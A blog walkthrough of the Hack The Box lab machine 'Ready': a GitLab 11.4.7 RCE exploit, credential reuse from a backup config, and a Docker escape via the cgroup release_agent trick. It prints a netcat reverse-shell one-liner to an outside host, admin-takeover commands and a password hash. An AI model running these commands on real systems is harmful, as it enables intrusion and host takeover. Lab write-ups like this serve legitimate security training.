<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.21.0 by Michael Rose
  Copyright 2013-2020 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Hackthebox write-up: Ready | Davi Cruz</title>
<meta name="description" content="Hello guys!  This week’s machine will be Ready, another median-rated machine from Hack The Box, created by bertolis.">


  <meta name="author" content="Davi Cruz">
  
  <meta property="article:author" content="Davi Cruz">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Davi Cruz">
<meta property="og:title" content="Hackthebox write-up: Ready">
<meta property="og:url" content="https://davicruz.com/writeup/2021/05/htb-ready/">


  <meta property="og:description" content="Hello guys!  This week’s machine will be Ready, another median-rated machine from Hack The Box, created by bertolis.">



  <meta property="og:image" content="https://i.imgur.com/R2EVM1J.png">



  <meta name="twitter:site" content="@zerahzurc">
  <meta name="twitter:title" content="Hackthebox write-up: Ready">
  <meta name="twitter:description" content="Hello guys!  This week’s machine will be Ready, another median-rated machine from Hack The Box, created by bertolis.">
  <meta name="twitter:domain" content="davicruz.com">
  <meta name="twitter:url" content="https://davicruz.com/writeup/2021/05/htb-ready/">

  
    <meta name="twitter:card" content="summary">
    
      <meta name="twitter:image" content="https://i.imgur.com/R2EVM1J.png">
    
  

  



  <meta property="article:published_time" content="2021-05-15T13:00:00-03:00">





  

  


<link rel="canonical" href="https://davicruz.com/writeup/2021/05/htb-ready/">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": "Davi Cruz",
      "url": "https://davicruz.com/",
      "sameAs": ["https://twitter.com/zerahzurc","https://www.linkedin.com/in/davicruz","https://github.com/davi-cruz"]
    
  }
</script>


  <meta name="google-site-verification" content="hrWV-PqvbpxEy2HdpVYFQNws2Sz_tROleVyF18s2kWA" />


  <meta name="msvalidate.01" content="60B1FA6CDAF15D226AB529AF30386BD8">



  <meta name="yandex-verification" content="08de8d8c0326420f">


<!-- end _includes/seo.html -->


<link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Davi Cruz Feed">

<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css">

<!--[if IE]>
  <style>
    /* old IE unsupported flexbox fixes */
    .greedy-nav .site-title {
      padding-right: 3em;
    }
    .greedy-nav button {
      position: absolute;
      top: 0;
      right: 0;
      height: 100%;
    }
  </style>
<![endif]-->



    <!-- start custom head snippets -->
<!-- Favicon -->
<link rel="shortcut icon" href="/assets/images/favicon.ico" />

<!-- Multilang tags -->

    
<link rel="alternate" hreflang="pt-BR" href="/writeup/2021/05/htb-ready/">
    

    
<link rel="alternate" hreflang="en-US" href="/en-US/writeup/2021/05/htb-ready/">
    


<!-- Cookie Consent - Osano -->
<link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.css" />

<!-- end custom head snippets -->

  </head>

  <body class="layout--single wide">
    <nav class="skip-links">
  <h2 class="screen-reader-text">Skip links</h2>
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    <!--[if lt IE 9]>
<div class="notice--danger align-center" style="margin: 0;">You are using an <strong>outdated</strong> browser. Please <a href="https://browsehappy.com/">upgrade your browser</a> to improve your experience.</div>
<![endif]-->

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
          
          <a class="site-logo" href="https://davicruz.com/en-US"><img src="/assets/images/logo.png" alt=""></a>
          
          <a class="site-title" href="https://davicruz.com/en-US">
            Davi Cruz
            
          </a>
        
        <ul class="visible-links">
<li class="masthead__menu-item">
            <a href="/en-US/categories/">Categories</a>
          </li>
<li class="masthead__menu-item">
            <a href="/en-US/tag/">Tags</a>
          </li>
<li class="masthead__menu-item">
            <a href="/en-US/about/">About</a>
          </li>
</ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <svg class="icon" width="16" height="16" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 15.99 16">
            <path d="M15.5,13.12L13.19,10.8a1.69,1.69,0,0,0-1.28-.55l-0.06-.06A6.5,6.5,0,0,0,5.77,0,6.5,6.5,0,0,0,2.46,11.59a6.47,6.47,0,0,0,7.74.26l0.05,0.05a1.65,1.65,0,0,0,.5,1.24l2.38,2.38A1.68,1.68,0,0,0,15.5,13.12ZM6.4,2A4.41,4.41,0,1,1,2,6.4,4.43,4.43,0,0,1,6.4,2Z" transform="translate(-.01)"></path>
          </svg>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      



<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person">

  
    <div class="author__avatar">
      
        <img src="/assets/images/bio-photo.jpg" alt="Davi Cruz" itemprop="image">
      
    </div>
  

  <div class="author__content">
    
      <h3 class="author__name" itemprop="name">Davi Cruz</h3>
    
    
      <div class="author__bio" itemprop="description">
        <p>Just another Cybersecurity professional</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      
        <li itemprop="homeLocation" itemscope itemtype="https://schema.org/Place">
          <i class="fas fa-fw fa-map-marker-alt" aria-hidden="true"></i> <span itemprop="name">São Paulo, BR</span>
        </li>
      

      
        
          
            <li><a href="https://linkedin.com/in/davicruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fab fa-linkedin" aria-hidden="true"></i><span class="label">Linkedin</span></a></li>
          
        
          
            <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i><span class="label">Twitter</span></a></li>
          
        
          
            <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      
<li>
  <strong></strong>
  
  <a class="link-br" href=""></a>
  
</li>

    </ul>
  </div>
</div>

  
  </div>



  <article class="page" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Hackthebox write-up: Ready">
    <meta itemprop="description" content="Hello guys!This week’s machine will be Ready, another median-rated machine from Hack The Box, created by bertolis.">
    <meta itemprop="datePublished" content="2021-05-15T13:00:00-03:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title" itemprop="headline">Hackthebox write-up: Ready
</h1>
          

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        <time datetime="2021-05-15T13:00:00-03:00">May 15, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          6 minute read
        
      </span>
    


      <!-- Start Read in other languages-->
        <span class="page__meta-sep page__meta-lang"></span>
        
        
        
        <span class="page__meta-lang"><a href="/writeup/2021/05/htb-ready/">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
        

        

        

        
        
        
        
      <!-- End Read in other languages-->
      <span class="page__meta-sep page__meta-share"></span>
      <span class="page__meta-share">
        <i class="fas fa-share-alt" aria-hidden="true"></i>
        <a href="#sharelinks">Share</a>
      </span>
  </p>


        </header>
      

      <section class="page__content" itemprop="text">
        
        <p>Hello guys!</p>

<p>This week’s machine will be <strong>Ready</strong>, another median-rated machine from <a href="https://www.hackthebox.eu">Hack The Box</a>, created by <a href="https://app.hackthebox.eu/users/27897">bertolis</a>.<!--more--></p>

<p class="notice--info"><img class="emoji" title=":information_source:" alt=":information_source:" src="https://github.githubassets.com/images/icons/emoji/unicode/2139.png" height="20" width="20"> <strong>Info</strong>: Write-ups for Hack The Box machines are posted as soon as they’re retired.</p>

<p><img src="https://i.imgur.com/iCTQUdu.png" alt="HTB Ready" class="align-center"></p>

<p>This machine had a very interesting resolution, where we’ll exploit a vulnerable version of GitLab Server and then escape docker container in order to obtain root flag.</p>

<h2 id="enumeration">Enumeration</h2>

<p>As usual, we start with a <code class="language-plaintext highlighter-rouge">nmap</code> quick scan, to identify the services currently published on this machine:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-Pn</span> <span class="nt">-oA</span> quick 10.10.10.220
Host discovery disabled <span class="o">(</span><span class="nt">-Pn</span><span class="o">)</span><span class="nb">.</span> All addresses will be marked <span class="s1">'up'</span> and scan <span class="nb">times </span>will be slower.
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-02-27 12:05 <span class="nt">-03</span>
Nmap scan report <span class="k">for </span>10.10.10.220
Host is up <span class="o">(</span>0.078s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae <span class="o">(</span>RSA<span class="o">)</span>
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb <span class="o">(</span>ED25519<span class="o">)</span>
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries <span class="o">(</span>15 shown<span class="o">)</span>
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/<span class="k">*</span>/edit /users /help 
|_/s/ /snippets/new /snippets/<span class="k">*</span>/edit
| http-title: Sign <span class="k">in</span> <span class="se">\x</span>C2<span class="se">\x</span>B7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>16.65 seconds
</code></pre></div></div>

<h3 id="5080tcp---http-service">5080/TCP - HTTP Service</h3>

<p>As we can see in <code class="language-plaintext highlighter-rouge">nmap</code> output, there’s a GitLab Server Community running. Similar to <a href="/en-US/writeup/2021/04/htb-laboratory/">Laboratory</a>, proceeded with an account creation to have access to public repositories in this server that could help us proceed in this box.</p>

<p>After account creation, no repository was found but noticed that the running GitLab Server version was <strong>11.4.7</strong>, as we can see in the image below.</p>

<p><img src="https://i.imgur.com/V5Oj0fB.png" alt="Gitlab Version" class="align-center"></p>

<h2 id="initial-foothold">Initial Foothold</h2>

<p>After a quick search on <code class="language-plaintext highlighter-rouge">searchsploit</code> for the listed version, identified some available exploits that could be used.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>searchsploit gitlab 11.4.7
<span class="nt">-------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
 Exploit Title                                                           |  Path
<span class="nt">-------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
GitLab 11.4.7 - RCE <span class="o">(</span>Authenticated<span class="o">)</span>                                      | ruby/webapps/49334.py
Gitlab 11.4.7 - Remote Code Execution                                    | ruby/webapps/49257.py
GitLab 11.4.7 - Remote Code Execution <span class="o">(</span>Authenticated<span class="o">)</span>                    | ruby/webapps/49263.py
<span class="nt">-------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
Shellcodes: No Results
</code></pre></div></div>

<p>Using the last result (49334.py), noticed that it didn’t allowed us to set the service port, which required some edit, as well as an issue in the payload generation, where was necessary to update the parameter <code class="language-plaintext highlighter-rouge">local_port</code> to <code class="language-plaintext highlighter-rouge">local_port = args.P</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>python3 49334.py <span class="nt">-h</span>                                                                
usage: 49334.py <span class="o">[</span><span class="nt">-h</span><span class="o">]</span> <span class="nt">-u</span> U <span class="nt">-p</span> P <span class="nt">-g</span> G <span class="nt">-l</span> L <span class="nt">-P</span> P

GitLab 11.4.7 RCE

optional arguments:
  <span class="nt">-h</span>, <span class="nt">--help</span>  show this <span class="nb">help </span>message and <span class="nb">exit</span>
  <span class="nt">-u</span> U        GitLab Username/Email
  <span class="nt">-p</span> P        Gitlab Password
  <span class="nt">-g</span> G        Gitlab URL <span class="o">(</span>without port<span class="o">)</span>
  <span class="nt">-l</span> L        reverse shell ip
  <span class="nt">-P</span> P        reverse shell port
</code></pre></div></div>

<p>Also, was necessary to change the payload used, once it wasn’t exporting the shell in <code class="language-plaintext highlighter-rouge">nc</code> session, preventing us from interacting with the machine.</p>

<p>After these changes, obtained a reverse shell as user <strong>git</strong> in the directory <code class="language-plaintext highlighter-rouge">~/gitlab-rails/working</code></p>

<h2 id="user-flag">User flag</h2>

<p>After initial shell, started enumeration using <code class="language-plaintext highlighter-rouge">linenum.sh</code>, where the following details called attention:</p>

<ul>
  <li>
    <p>App execution inside a docker container, being necessary to escape to the host later.</p>
  </li>
  <li>
    <p>There’s a local user <code class="language-plaintext highlighter-rouge">dude</code> (id=1000), where the user flag <code class="language-plaintext highlighter-rouge">user.txt</code> resides in his home directory.</p>
  </li>
  <li>
    <p>Obtained the GitLab Server credentials dump, where the user <code class="language-plaintext highlighter-rouge">root</code> is the only one with privileges, which has the password hash below:</p>

    <table>
      <thead>
        <tr>
          <th>username</th>
          <th>e-mail</th>
          <th>admin</th>
          <th>hash</th>
        </tr>
      </thead>
      <tbody>
        <tr>
          <td>root</td>
          <td>admin@example.com</td>
          <td>true</td>
          <td>$2a$10$zzun9kmrHMdwsJZKTmwn9OZddFjwrhbaXx3b2eb9l2g.1LrjZo0V2</td>
        </tr>
      </tbody>
    </table>
  </li>
</ul>

<p>Based on the information above, first thing tried was to check the required privileges to read <code class="language-plaintext highlighter-rouge">user.txt</code>, where we identified that <code class="language-plaintext highlighter-rouge">git</code> user had access, so we’ve collected it.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git@gitlab:/home/dude<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
total 24
drwxr-xr-x 2 dude dude 4096 Dec  7 16:58 <span class="nb">.</span>
drwxr-xr-x 1 root root 4096 Dec  2 10:45 ..
lrwxrwxrwx 1 root root    9 Dec  7 16:58 .bash_history -&gt; /dev/null
<span class="nt">-rw-r--r--</span> 1 dude dude  220 Aug 31  2015 .bash_logout
<span class="nt">-rw-r--r--</span> 1 dude dude 3771 Aug 31  2015 .bashrc
<span class="nt">-rw-r--r--</span> 1 dude dude  655 May 16  2017 .profile
<span class="nt">-r--r-----</span> 1 dude git    33 Dec  2 10:46 user.txt
git@gitlab:/home/dude<span class="nv">$ </span><span class="nb">cat </span>user.txt
&lt;redacted&gt;
</code></pre></div></div>

<h2 id="root-flag">Root flag</h2>

<p>Next step would be obtaining the root credential to read the <code class="language-plaintext highlighter-rouge">root.txt</code> flag. As we had his password hash would be easy to crack it or search in internet but, as this task consumes lot of time and resources, decided to skip this for now as this hash wasn’t still publicly known.</p>

<p>During the enumeration, the information was also shared along with the credential dump:</p>

<blockquote>
  <p>If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner ‘user = User.find_by(email: “youruser@example.com”); user.admin = TRUE; user.save!’
Alternatively, you could change the password of any user by running: gitlab-rails runner ‘user = User.find_by(email: “admin@example.com”); user.password = “pass_peass_pass”; user.password_confirmation = “pass_peass_pass”; user.save!’</p>
</blockquote>

<p>Based on that, proceeded with the root account password reset as recommended, but no private repository or additional information was found, that could help us succeed on obtaining root’s credentials.</p>

<p>That said, decided to perform a manual enumeration and, looking for backups in the file system, found a directory <code class="language-plaintext highlighter-rouge">/opt/backup/</code>, that contained several files inside it.</p>

<p>Performing an <code class="language-plaintext highlighter-rouge">grep</code> search on it looking for passwords (<code class="language-plaintext highlighter-rouge">passwd</code>, <code class="language-plaintext highlighter-rouge">password</code>, <code class="language-plaintext highlighter-rouge">pwd</code>), found an entry that called attention on <code class="language-plaintext highlighter-rouge">/opt/backup/gitlab.rb</code>, as we can see in the output below, after removing commented and blank lines.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git@gitlab:/opt/backup<span class="nv">$ </span><span class="nb">cat</span> /opt/backup/gitlab.rb | <span class="nb">grep</span> <span class="nt">-Ev</span> <span class="s1">'^#|^$'</span>
gitlab_rails[<span class="s1">'smtp_password'</span><span class="o">]</span> <span class="o">=</span> <span class="s2">"wW59U!ZKMbG9+*#h"</span>
git@gitlab:/opt/backup<span class="err">$</span>
</code></pre></div></div>

<p>With this credential, tested it for the user <code class="language-plaintext highlighter-rouge">root</code> and succeeded, but in root’s home path <strong>there was no <code class="language-plaintext highlighter-rouge">root.txt</code></strong>, indicating that we’ll need to escape the container to obtain the root’s flag.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git@gitlab:/opt/backup<span class="nv">$ </span>su root
Password:
root@gitlab:/opt/backup# <span class="nb">ls</span> <span class="nt">-la</span> /root
total 28
drwx------ 1 root root 4096 Feb 27 13:24 <span class="nb">.</span>
drwxr-xr-x 1 root root 4096 Dec  1 12:41 ..
lrwxrwxrwx 1 root root    9 Dec  7 16:56 .bash_history -&gt; /dev/null
<span class="nt">-rw-r--r--</span> 1 root root 3106 Oct 22  2015 .bashrc
drwxr-xr-x 2 root root 4096 Feb 27 13:24 .nano
<span class="nt">-rw-r--r--</span> 1 root root  148 Aug 17  2015 .profile
drwx------ 2 root root 4096 Dec  7 16:49 .ssh
<span class="nt">-rw-------</span> 1 root root 1565 Dec 13 15:06 .viminfo
root@gitlab:/opt/backup#
</code></pre></div></div>

<h3 id="escaping-container">Escaping container</h3>

<p>Once we have privileged access inside the container, if it is running under specific circunstancies, we can escape to the host as was very well documented in this blog post <a href="https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/">Understanding Docker container escapes | Trail of Bits Blog</a>, found after some research in this scenario.</p>

<p>Following the step-by-step described on it, created a listener in 4443 TCP in attacker machine and executed the following steps using root privileges, obtaining this way a reverse shell.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># In the container</span>
<span class="nb">mkdir</span> /tmp/cgrp <span class="o">&amp;&amp;</span> mount <span class="nt">-t</span> cgroup <span class="nt">-o</span> rdma cgroup /tmp/cgrp <span class="o">&amp;&amp;</span> <span class="nb">mkdir</span> /tmp/cgrp/x
 
<span class="nb">echo </span>1 <span class="o">&gt;</span> /tmp/cgrp/x/notify_on_release
<span class="nv">host_path</span><span class="o">=</span><span class="sb">`</span><span class="nb">sed</span> <span class="nt">-n</span> <span class="s1">'s/.*\perdir=\([^,]*\).*/\1/p'</span> /etc/mtab<span class="sb">`</span>
<span class="nb">echo</span> <span class="s2">"</span><span class="nv">$host_path</span><span class="s2">/cmd"</span> <span class="o">&gt;</span> /tmp/cgrp/release_agent
 
<span class="nb">echo</span> <span class="s1">'#!/bin/sh'</span> <span class="o">&gt;</span> /cmd
<span class="nb">echo</span> <span class="s2">"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.10.10 4443 &gt;/tmp/f"</span> <span class="o">&gt;&gt;</span> /cmd
<span class="nb">chmod </span>a+x /cmd
 
sh <span class="nt">-c</span> <span class="s2">"echo </span><span class="se">\$\$</span><span class="s2"> &gt; /tmp/cgrp/x/cgroup.procs"</span>
</code></pre></div></div>

<p>In the received connection, confirmed that we were in the host running <code class="language-plaintext highlighter-rouge">docker ps</code> command and then obtained the root flag.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nc <span class="nt">-lnvp</span> 4443
listening on <span class="o">[</span>any] 4443 ...
connect to <span class="o">[</span>10.10.14.136] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.220] 38246
/bin/sh: 0: can<span class="s1">'t access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# docker ps
CONTAINER ID        IMAGE                          COMMAND             CREATED             STATUS                 PORTS                                   NAMES
7eb263389e5e        gitlab/gitlab-ce:11.4.7-ce.0   "/assets/wrapper"   2 months ago        Up 5 hours (healthy)   22/tcp, 443/tcp, 0.0.0.0:5080-&gt;80/tcp   docker-gitlab_web_1
# cat /root/root.txt
&lt;redacted&gt;
</span></code></pre></div></div>

<p>I hope you guys have enjoyed.</p>

<p>See you in the next post! <img class="emoji" title=":smile:" alt=":smile:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f604.png" height="20" width="20"></p>

        
      </section>

      <footer class="page__meta">
        
        
  


  
  
  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      
      
      <a href="/en-US/tag/#hackthebox" class="page__taxonomy-item" rel="tag">HackTheBox</a><span class="sep">, </span>
    
      
      
      <a href="/en-US/tag/#htb-linux" class="page__taxonomy-item" rel="tag">htb-linux</a><span class="sep">, </span>
    
      
      
      <a href="/en-US/tag/#htb-medium" class="page__taxonomy-item" rel="tag">htb-medium</a>
    
    </span>
  </p>




  


  
  
  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      
      
      <a href="/en-US/categories/#writeup" class="page__taxonomy-item" rel="tag">Writeup</a>
    
    </span>
  </p>


        
  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time datetime="2021-05-15T13:00:00-03:00">May 15, 2021</time></p>


      </footer>

      <section id="sharelinks" class="page__share">
  
    <h4 class="page__share-title">Share on</h4>
  

  <a href="https://twitter.com/intent/tweet?via=zerahzurc&amp;text=Hackthebox+write-up%3A+Ready%20https%3A%2F%2Fdavicruz.com%2Fwriteup%2F2021%2F05%2Fhtb-ready%2F" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fdavicruz.com%2Fwriteup%2F2021%2F05%2Fhtb-ready%2F" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fdavicruz.com%2Fwriteup%2F2021%2F05%2Fhtb-ready%2F" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>

  <a href="whatsapp://send?text=https%3A%2F%2Fdavicruz.com%2Fwriteup%2F2021%2F05%2Fhtb-ready%2F" data-action="share/whatsapp/share" class="btn btn--whatsapp" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Whatsapp"><i class="fab fa-fw fa-whatsapp" aria-hidden="true"></i><span> Whatsapp</span></a>

  <a href="https://telegram.me/share/url?url=https%3A%2F%2Fdavicruz.com%2Fwriteup%2F2021%2F05%2Fhtb-ready%2F&amp;text=Hackthebox+write-up%3A+Ready" class="btn btn--telegram" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Telegram"><i class="fab fa-fw fa-telegram-plane" aria-hidden="true"></i><span> Telegram</span></a>


</section>


      
  <nav class="pagination">
    
    
      <a href="/en-US/writeup/2021/04/htb-bucket/" class="pagination--pager" title="Hackthebox write-up: Bucket
">Previous</a>
    
    
    
      
        <a href="/en-US/writeup/2021/05/htb-delivery/" class="pagination--pager" title="Hackthebox write-up: Delivery
">Next</a>
        
    
  </nav>

    </div>

    
      <div class="page__comments">
  
  
      <h4 class="page__comments-title">Leave a comment</h4>
      <section id="utterances-comments"></section>
    
</div>

    
  </article>

  
  
    <div class="page__related">
      <h4 class="page__related-title">You may also enjoy</h4>
      <div class="grid__wrapper">
        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/BmkB4rb.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
      
      
      <a href="https://davicruz.com/en-US/writeup/2021/06/htb-tenet/" rel="permalink">Hackthebox write-up: Tenet
</a>
      
      
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        <time datetime="2021-06-12T13:00:00-03:00">June 12, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          7 minute read
        
      </span>
    


      <!-- Start Read in other languages-->
        <span class="page__meta-sep page__meta-lang"></span>
        
        
        
        <span class="page__meta-lang"><a href="/writeup/2021/05/htb-ready/">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
        

        

        

        
        
        
        
      <!-- End Read in other languages-->
      <span class="page__meta-sep page__meta-share"></span>
      <span class="page__meta-share">
        <i class="fas fa-share-alt" aria-hidden="true"></i>
        <a href="#sharelinks">Share</a>
      </span>
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Tenet, another medium-rated Linux box from Hack The Box, created by egotisticalSW.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/wHnMfBz.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
      
      
      <a href="https://davicruz.com/en-US/writeup/2021/06/htb-scriptkiddie/" rel="permalink">Hackthebox write-up: ScriptKiddie
</a>
      
      
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        <time datetime="2021-06-05T13:00:00-03:00">June 5, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          5 minute read
        
      </span>
    


      <!-- Start Read in other languages-->
        <span class="page__meta-sep page__meta-lang"></span>
        
        
        
        <span class="page__meta-lang"><a href="/writeup/2021/05/htb-ready/">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
        

        

        

        
        
        
        
      <!-- End Read in other languages-->
      <span class="page__meta-sep page__meta-share"></span>
      <span class="page__meta-share">
        <i class="fas fa-share-alt" aria-hidden="true"></i>
        <a href="#sharelinks">Share</a>
      </span>
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be ScriptKiddie, another easy-rated Linux box from Hack The Box, created by 0xdf.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/FTjLM76.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
      
      
      <a href="https://davicruz.com/en-US/writeup/2021/05/htb-delivery/" rel="permalink">Hackthebox write-up: Delivery
</a>
      
      
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        <time datetime="2021-05-22T13:00:00-03:00">May 22, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          8 minute read
        
      </span>
    


      <!-- Start Read in other languages-->
        <span class="page__meta-sep page__meta-lang"></span>
        
        
        
